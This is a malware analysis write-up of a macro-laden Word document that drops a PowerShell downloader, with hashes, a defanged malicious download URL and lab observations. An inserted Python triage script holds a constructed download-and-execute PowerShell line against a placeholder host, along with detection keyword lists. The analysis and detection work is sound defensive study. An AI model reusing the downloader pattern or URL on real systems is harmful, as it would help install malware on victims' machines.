Malware Analysis – Microsoft Word (VBA Macro Downloader using PowerShell)

1) Sample Details:

MD5 – 5ab2c99e5b4673494c2b37da10442bc3
SHA-1 – 00d379f6e1d040a185f7c7d678879360a1570b47
SHA-256 – 05e1e27194872ea82491a474afd2273bdad56e2b61172453ef3e771be6965c82

$ file PT798800-TT000768-11.doc
PT798800-TT000768-11.doc: Microsoft Word 2007+

2) Right away we see the suggestion to enable macros, along with a “100% Virus Satisfaction Guaranteed Seal” with a check mark next to ‘No Download’ (seems legit :p).

3) There was a lot of junk code, such as empty variables, in the VBA macro:

After some basic clean-up, I got the code below:

4) After further analysis...

becomes...

Setting a breakpoint on the second instance of ‘XSxMDWlQw7O6442qdqr2ktnsz_Jzu__o__YHxzT81ZK4S_AvPvVT’ and executing gives the result below:

5) So, ‘XSxMDWlQw7O6442qdqr2ktnsz_Jzu__o__YHxzT81ZK4S_AvPvVT’ becomes the following:

which is the same as the script below; this is the malicious script that gets executed on the device:

This is Base64-encoded; the decoded version is below:

So, a PE file will presumably be downloaded from the link below, moved to the Temp folder as TLEWf5fHN4.exe, and executed:

hxxp://tehrenberg[.]com/download[.]php?file=NjU4NjYzNjk3MF9fX19iYWJhbW0uZXhl
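The decoding step above (Base64 → PowerShell script → download URL and drop path) is what a triage script automates when the same launcher pattern shows up in process-creation logs. The following is an added example, not code from the post or from the sample: it reconstructs a constructed command line (placeholder URL and file parameter; only the drop name TLEWf5fHN4.exe comes from the analysis), decodes it the way `-EncodedCommand` is decoded (Base64 of UTF-16LE), and flags the download-and-execute combination. The keyword lists are my own assumptions about what to look for.

```python
import base64
import re

# Constructed sample (not the page's payload): the downloader pattern the
# write-up describes, wrapped the way powershell.exe -EncodedCommand expects.
# The URL and file parameter are placeholders; the drop name is from the page.
SAMPLE_SCRIPT = (
    "$p = $env:TEMP + '\\TLEWf5fHN4.exe'; "
    "(New-Object Net.WebClient).DownloadFile("
    "'http://example.invalid/download.php?file=PLACEHOLDER', $p); "
    "Start-Process $p"
)

ENC_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)
URL_RE = re.compile(r"https?://[^\s'\"),]+", re.I)
DROP_RE = re.compile(r"[\w-]+\.exe\b", re.I)
# Assumed indicator lists: fetch primitives and execution primitives.
DOWNLOAD_KEYWORDS = ("downloadfile", "downloadstring", "invoke-webrequest", "iwr")
EXEC_KEYWORDS = ("start-process", "invoke-expression", "iex", "invoke-item")


def encode_command(script: str) -> str:
    """Encode a script as PowerShell does for -EncodedCommand: UTF-16LE, then Base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return the decoded script if the command line carries -EncodedCommand, else None."""
    match = ENC_RE.search(cmdline)
    if not match:
        return None
    return base64.b64decode(match.group(1)).decode("utf-16-le", errors="replace")


def triage(cmdline: str) -> dict:
    """Decode an encoded PowerShell command line and flag download-and-execute behaviour."""
    script = decode_encoded_command(cmdline)
    if script is None:
        return {"encoded": False, "suspicious": False, "urls": [], "drops": [], "script": None}
    lowered = script.lower()
    downloads = any(k in lowered for k in DOWNLOAD_KEYWORDS)
    executes = any(k in lowered for k in EXEC_KEYWORDS)
    return {
        "encoded": True,
        "suspicious": downloads and executes,  # the chain in the write-up: fetch, drop, run
        "urls": URL_RE.findall(script),        # candidate download links to defang and block
        "drops": DROP_RE.findall(script),      # file names to hunt for in %TEMP%
        "script": script,
    }


if __name__ == "__main__":
    cmd = "powershell.exe -NoP -W Hidden -Enc " + encode_command(SAMPLE_SCRIPT)
    print(triage(cmd))
```

The extracted URLs should be defanged (as the post does) before they are pasted into a report or ticket.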

6) I tried running the PowerShell script in my lab and observed the results below.

Lab Setup:
Windows 10 – Does not have Internet Connectivity.
REMnux – Is the Default Gateway for W10 and has fakedns and INetSim running.

We get ‘File or directory is corrupted and unreadable’ because the file served is the fake one provided by INetSim.

I was able to download it manually; the SHA-256 of the downloaded PE file is 569044a286d02a335b7febfe434b1779655bbe54bd872eed6c04ec8eacc78e9f

https://www.virustotal.com/gui/file/569044a286d02a335b7febfe434b1779655bbe54bd872eed6c04ec8eacc78e9f/details
